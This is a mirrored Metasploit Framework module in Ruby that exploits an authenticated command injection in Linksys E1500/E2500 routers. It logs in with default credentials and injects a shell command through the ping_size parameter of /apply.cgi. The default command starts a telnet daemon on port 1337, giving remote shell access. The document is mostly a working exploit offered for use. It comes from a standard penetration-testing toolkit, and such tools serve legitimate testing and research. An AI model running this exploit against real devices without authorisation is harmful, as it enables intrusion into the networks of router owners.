Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb
19715 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Auxiliary
7
include Msf::Exploit::Remote::HttpClient
8
9
def initialize(info = {})
10
super(
11
update_info(
12
info,
13
'Name' => 'Linksys E1500/E2500 Remote Command Execution',
14
'Description' => %q{
15
Some Linksys Routers are vulnerable to an authenticated OS command injection.
16
Default credentials for the web interface are admin/admin or admin/password. Since
17
it is a blind os command injection vulnerability, there is no output for the
18
executed command. A ping command against a controlled system for can be used for
19
testing purposes.
20
},
21
'Author' => [ 'Michael Messner <devnull[at]s3cur1ty.de>' ],
22
'License' => MSF_LICENSE,
23
'References' => [
24
[ 'OSVDB', '89912' ],
25
[ 'BID', '57760' ],
26
[ 'EDB', '24475' ],
27
[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-004' ]
28
],
29
'DisclosureDate' => '2013-02-05',
30
'Notes' => {
31
'Stability' => [CRASH_SAFE],
32
'SideEffects' => [IOC_IN_LOGS],
33
'Reliability' => []
34
}
35
)
36
)
37
38
register_options(
39
[
40
OptString.new('HttpUsername', [ true, 'User to login with', 'admin']),
41
OptString.new('HttpPassword', [ true, 'Password to login with', 'password']),
42
OptString.new('CMD', [ true, 'The command to execute', 'telnetd -p 1337'])
43
]
44
)
45
end
46
47
def run
48
uri = '/apply.cgi'
49
user = datastore['HttpUsername']
50
pass = datastore['HttpPassword']
51
52
print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
53
54
begin
55
res = send_request_cgi({
56
'uri' => uri,
57
'method' => 'GET',
58
'authorization' => basic_auth(user, pass)
59
})
60
61
return if res.nil?
62
return if (res.code == 404)
63
64
if [200, 301, 302].include?(res.code)
65
print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")
66
else
67
print_error("#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
68
return
69
end
70
rescue ::Rex::ConnectionError
71
vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
72
return
73
end
74
75
print_status("#{rhost}:#{rport} - Sending remote command: " + datastore['CMD'])
76
77
cmd = datastore['CMD']
78
# original post request:
79
# data_cmd = "submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&
80
# action=&commit=0&ping_ip=1.1.1.1&ping_size=%26#{cmd}%26&ping_times=5&traceroute_ip="
81
82
vprint_status("#{rhost}:#{rport} - using the following target URL: #{uri}")
83
begin
84
send_request_cgi({
85
'uri' => uri,
86
'method' => 'POST',
87
'authorization' => basic_auth(user, pass),
88
'vars_post' => {
89
'submit_button' => 'Diagnostics',
90
'change_action' => 'gozila_cgi',
91
'submit_type' => 'start_ping',
92
'action' => '',
93
'commit' => '0',
94
'ping_ip' => '1.1.1.1',
95
'ping_size' => "&#{cmd}&",
96
'ping_times' => '5',
97
'traceroute_ip' => ''
98
}
99
})
100
rescue ::Rex::ConnectionError
101
vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
102
return
103
end
104
print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
105
print_status("#{rhost}:#{rport} - Blind Exploitation - wait around 10 seconds till the command gets executed")
106
end
107
end
108
109